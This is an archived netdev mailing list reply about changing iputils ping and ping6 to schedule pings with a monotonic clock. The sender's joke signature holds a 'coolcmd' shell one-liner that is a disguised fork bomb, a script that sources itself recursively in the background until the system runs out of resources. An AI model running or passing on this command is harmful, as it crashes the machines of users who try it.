lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date:	Tue, 21 Sep 2010 08:50:57 +0200 (CEST)
From:	Thomas Habets <thomas@...ets.pp.se>
To:	YOSHIFUJI Hideaki <yoshfuji@...ux-ipv6.org>
cc:	Thomas Habets <thomas@...ets.pp.se>,
	Jan Ceuleers <jan.ceuleers@...puter.org>,
	netdev@...r.kernel.org
Subject: Re: [PATCH] iputils ping,ping6: use monotonic clock to schedule
 pings

On Tue, 21 Sep 2010, YOSHIFUJI Hideaki wrote:
> Why don't we convert most (if not all) gettimeofday(), then?

I wanted to initially just solve the easy part in case it wouldn't be 
accepted.

The latency measuring parts are more complicated because they're not 
always gettimeofday() but SO_TIMESTAMP or SIOCGSTAMP with just a fallback 
to gettimeofday(). I can dig deeper next week.

---------
typedef struct me_s {
   char name[]      = { "Thomas Habets" };
   char email[]     = { "thomas@...ets.pp.se" };
   char kernel[]    = { "Linux" };
   char *pgpKey[]   = { "http://www.habets.pp.se/pubkey.txt" };
   char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE  0945 286A E90A AD48 E854" };
   char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
--
To unsubscribe from this list: send the line "unsubscribe netdev" in
the body of a message to majordomo@...r.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ